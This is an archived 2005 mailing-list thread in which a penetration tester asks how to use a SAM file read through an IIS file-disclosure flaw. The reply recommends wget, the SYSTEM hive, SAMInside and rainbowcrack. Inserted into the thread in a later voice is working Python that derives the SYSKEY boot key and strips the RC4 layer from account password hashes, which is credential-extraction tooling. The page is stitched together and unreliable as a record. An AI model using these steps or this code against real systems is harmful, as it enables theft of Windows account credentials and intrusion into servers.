Re: Sam File via IIS flaw

From: David Cravshaw (david.cravshaw@gmail.com)
Date: Thu Jun 30 2005 - 13:11:54 EDT


I recently ran into a similar issue. Since the browser doesn't
interpret the SAM file particularly well, you'll need something else
to pull it down. wget worked just fine in my case. Also note that,
due to syskey (enabled by default on win2000+), you will need to pull
down /winnt/repair/system and use something like SAMInside, which Jerome
mentioned, to extract the hashes from the SAM using the syskey in the
system file.

Then you have the hashes in L0pht-able or, more preferably,
rainbowcrack-able format!

On 28 Jun 2005 19:02:54 -0000, nordicsmak@yahoo.com
<nordicsmak@yahoo.com> wrote:
> During a recent penetration test I've discovered a flaw in the IIS server that allows me to browse to and view any file on the system.
>
> I'm able to browse to the /winnt/repair/sam file, but it obviously is unusable in the format that's presented in the browser.
>
> Any way to get this file in a format that can be used in L0pht?
>
> Thanks,
> Chris
>
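The syskey step that the reply above describes (the SYSTEM hive's boot key is what unlocks the SAM) is worked through below as an added example; it is not code from the original thread and not SAMInside's or L0phtCrack's code. It implements the SYSKEY derivation as documented by pwdump2/creddump: the boot key comes from the class names of the four keys SYSTEM\ControlSet00N\Control\Lsa\{JD,Skew1,GBG,Data}, the "hashed boot key" from the F value under SAM\SAM\Domains\Account, and each account's RC4 key from that plus the RID. Hive parsing is left to a real tool; the example assumes those values have already been read out of the two hives you pulled down, and the class names, F value, RID and encrypted hash used in demo() are constructed sample data, not from any real machine. The last layer on each hash (two DES-ECB blocks keyed from the RID) is noted but not performed, since the standard library has no DES.

```python
"""SYSKEY side of SAM hash extraction, pure Python 3 (hashlib + struct only).

Inputs are values already extracted from the SYSTEM and SAM hives:
  SYSTEM\\ControlSet00N\\Control\\Lsa\\{JD,Skew1,GBG,Data} class names
  SAM\\SAM\\Domains\\Account  ->  F value
Constants and offsets follow pwdump2 / creddump.
"""
import hashlib
import struct

# Byte permutation applied to the concatenated class names (pwdump2 / creddump).
BOOTKEY_PERM = [0x8, 0x5, 0x4, 0x2, 0xB, 0x9, 0xD, 0x3,
                0x0, 0x6, 0x1, 0xC, 0xE, 0xA, 0xF, 0x7]
# Fixed salts mixed into the MD5 that keys the RC4 layer over the F value.
AQWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
ANUM = b"0123456789012345678901234567890123456789\0"
NTPASSWORD = b"NTPASSWORD\0"
LMPASSWORD = b"LMPASSWORD\0"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encrypt and decrypt are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def bootkey_from_class_names(jd: str, skew1: str, gbg: str, data: str) -> bytes:
    """Each class name is 8 hex digits (UTF-16LE in the hive, decoded by the
    caller). Concatenate in JD, Skew1, GBG, Data order -> 16 bytes, then permute."""
    raw = bytes.fromhex(jd + skew1 + gbg + data)
    if len(raw) != 16:
        raise ValueError("expected 16 bytes of scrambled boot key")
    return bytes(raw[BOOTKEY_PERM[i]] for i in range(16))


def hashed_bootkey(f_value: bytes, bootkey: bytes) -> bytes:
    """hbootkey = RC4(MD5(F[0x70:0x80] + AQWERTY + bootkey + ANUM), F[0x80:0xA0]).
    Only the first 16 bytes of the 32-byte result are used later."""
    if len(f_value) < 0xA0:
        raise ValueError("F value too short (need at least 0xA0 bytes)")
    rc4_key = hashlib.md5(f_value[0x70:0x80] + AQWERTY + bootkey + ANUM).digest()
    return rc4(rc4_key, f_value[0x80:0xA0])


def account_rc4_key(hbootkey: bytes, rid: int, nt: bool = True) -> bytes:
    """Per-account key: MD5(hbootkey[:16] + RID as little-endian DWORD + label)."""
    label = NTPASSWORD if nt else LMPASSWORD
    return hashlib.md5(hbootkey[:16] + struct.pack("<L", rid) + label).digest()


def unwrap_hash(hbootkey: bytes, rid: int, enc_hash: bytes, nt: bool = True) -> bytes:
    """Strip the RC4 layer from the 16-byte encrypted hash found in the account's
    V value. The result is still DES-obfuscated: decrypt it as two 8-byte DES-ECB
    blocks whose keys are derived from the RID (not done here; stdlib has no DES)."""
    if len(enc_hash) != 16:
        raise ValueError("encrypted hash must be 16 bytes")
    return rc4(account_rc4_key(hbootkey, rid, nt), enc_hash)


def demo() -> dict:
    # CONSTRUCTED sample inputs; not taken from any real SYSTEM/SAM hive.
    class_names = ("7a1f3c9e", "02b4d6e8", "f0a1b2c3", "d4e5f607")
    f_value = bytes((i * 37 + 11) & 0xFF for i in range(0xA0))
    enc_nt = bytes.fromhex("00112233445566778899aabbccddeeff")
    rid = 500  # built-in Administrator
    bk = bootkey_from_class_names(*class_names)
    hbk = hashed_bootkey(f_value, bk)
    obf = unwrap_hash(hbk, rid, enc_nt, nt=True)
    return {"bootkey": bk.hex(), "hbootkey": hbk.hex(), "nt_obfkey": obf.hex()}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Note that %SystemRoot%\repair holds the backup copies of the hives written at install time or by rdisk, so the hashes recovered this way may be older than the ones in system32\config; if the traversal flaw also reaches the live hives, those are locked by the kernel and will not be served.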



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:30 EDT